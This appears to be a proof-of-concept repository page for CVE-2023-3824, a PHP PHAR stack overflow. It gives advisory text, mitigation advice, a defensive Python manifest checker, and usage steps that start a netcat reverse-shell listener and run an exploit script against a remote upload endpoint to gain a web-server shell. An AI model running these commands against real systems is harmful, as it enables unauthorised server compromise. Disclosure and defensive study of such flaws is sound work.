PoC details: 0b128e35c13f0e30c0d4ed3eaa453197c22dc6ec

Source
Related vulnerability
Title: PHP buffer error vulnerability (CVE-2023-3824)
Description: PHP is a scripting language executed on the server side. PHP contains a security vulnerability that stems from a buffer overflow in the function phar_dir_read(); it can lead to memory corruption or remote code execution (RCE). Affected products and versions: PHP 8.0 versions before 8.0.30, 8.1 versions before 8.1.22, and 8.2 versions before 8.2.8.
Description
In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading a phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, potentially leading to memory corruption or RCE.
Introduction
# About

CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.

## Exploitation Overview

- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.

## Exploit Example

The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.

A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.

## Mitigation

- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.

This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
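As an added defensive example (not part of this PoC and not PHP's own code), the Python below parses the PHAR manifest that follows the stub and flags file entries whose names exceed a configurable bound, so an upload handler can reject such an archive before PHP ever opens it. The 255-byte bound and the `sample_phar()` test input are assumptions of this example, not values from the advisory.

```python
import struct

HALT = b"__HALT_COMPILER();"
MAX_NAME = 255  # assumed pre-screen bound; ordinary archives stay far below it

def _u32(buf, off):
    """Little-endian uint32 at off, with an explicit truncation check."""
    if off + 4 > len(buf):
        raise ValueError("truncated manifest at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0], off + 4

def phar_entry_names(data):
    """Walk the PHAR manifest that follows the stub and return every entry name."""
    idx = data.find(HALT)
    if idx < 0:
        raise ValueError("no __HALT_COMPILER(); marker: not a phar stub")
    off = idx + len(HALT)
    if data.startswith(b" ?>", off):       # optional close tag after the halt
        off += 3
    if data.startswith(b"\r\n", off):      # optional newline after it
        off += 2
    elif data.startswith(b"\n", off):
        off += 1
    manifest_len, off = _u32(data, off)
    manifest = data[off:off + manifest_len]
    if len(manifest) != manifest_len:
        raise ValueError("manifest length exceeds file size")
    nfiles, p = _u32(manifest, 0)
    p += 2 + 4                             # API version (u16) + global flags (u32)
    alias_len, p = _u32(manifest, p)
    meta_len, p = _u32(manifest, p + alias_len)
    p += meta_len
    names = []
    for _ in range(nfiles):
        name_len, p = _u32(manifest, p)
        if p + name_len > len(manifest):
            raise ValueError("filename length overruns manifest")
        names.append(manifest[p:p + name_len])
        p += name_len + 4 * 5              # size, mtime, csize, crc32, flags
        entry_meta_len, p = _u32(manifest, p)
        p += entry_meta_len
    return names

def oversized_entries(data, limit=MAX_NAME):
    """Entry names longer than limit: reject the upload before PHP opens it."""
    return [n for n in phar_entry_names(data) if len(n) > limit]

def sample_phar(name):
    """Constructed test input: stub + one-entry manifest, no file data or signature."""
    entry = struct.pack("<I", len(name)) + name + struct.pack("<6I", 0, 0, 0, 0, 0, 0)
    body = struct.pack("<IHIII", 1, 0x1100, 0, 0, 0) + entry
    return b"<?php __HALT_COMPILER(); ?>\n" + struct.pack("<I", len(body)) + body
```

Any `ValueError` from the parser (no stub marker, truncated or self-inconsistent manifest) should be treated as a rejection too, since a well-formed archive never triggers one.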

# POC

Run reverse shell listener:

```bash
nc -l local_port
```

Then run POC:

```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```

* _remote_url_ is the vulnerable remote PHP script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is the attacker machine's IP
* _local_port_ is the attacker machine's port

If the exploit succeeds, you'll get a shell with the web server's (apache, nginx) permissions.

---

```text
                                                        .--,-``-.             
                                             ,---,     /   /     '.           
  ,---,                                    ,--.' |    / ../        ;          
,---.'|                                    |  |  :    \ ``\  .`-    '  __  ,-.
|   | :                           .--.--.  :  :  :     \___\/   \   :,' ,'/ /|
:   : :      ,--.--.     ,---.   /  /    ' :  |  |,--.      \   :   |'  | |' |
:     |,-.  /       \   /     \ |  :  /`./ |  :  '   |      /  /   / |  |   ,'
|   : '  | .--.  .-. | /    /  ||  :  ;_   |  |   /' :      \  \   \ '  :  /  
|   |  / :  \__\/: . ..    ' / | \  \    `.'  :  | | |  ___ /   :   ||  | '   
'   : |: |  ," .--.; |'   ;   /|  `----.   \  |  ' | : /   /\   /   :;  : |   
|   | '/ : /  /  ,.  |'   |  / | /  /`--'  /  :  :_:,'/ ,,/  ',-    .|  , ;   
|   :    |;  :   .'   \   :    |'--'.     /|  | ,'    \ ''\        ;  ---'    
/    \  / |  ,     .-./\   \  /   `--'---' `--''       \   \     .'           
`-'----'   `--`---'     `----'                          `--`-,,-'             
```

---
inspired by ::PerfectForms::
File snapshot

```text
[4.0K] /data/pocs/0b128e35c13f0e30c0d4ed3eaa453197c22dc6ec
├── [1.2K] cve-2023-3824.sh
├── [ 192] generate.php
├── [   0] injectee.php
├── [ 39K] payload.bin
└── [3.5K] README.md

0 directories, 5 files
```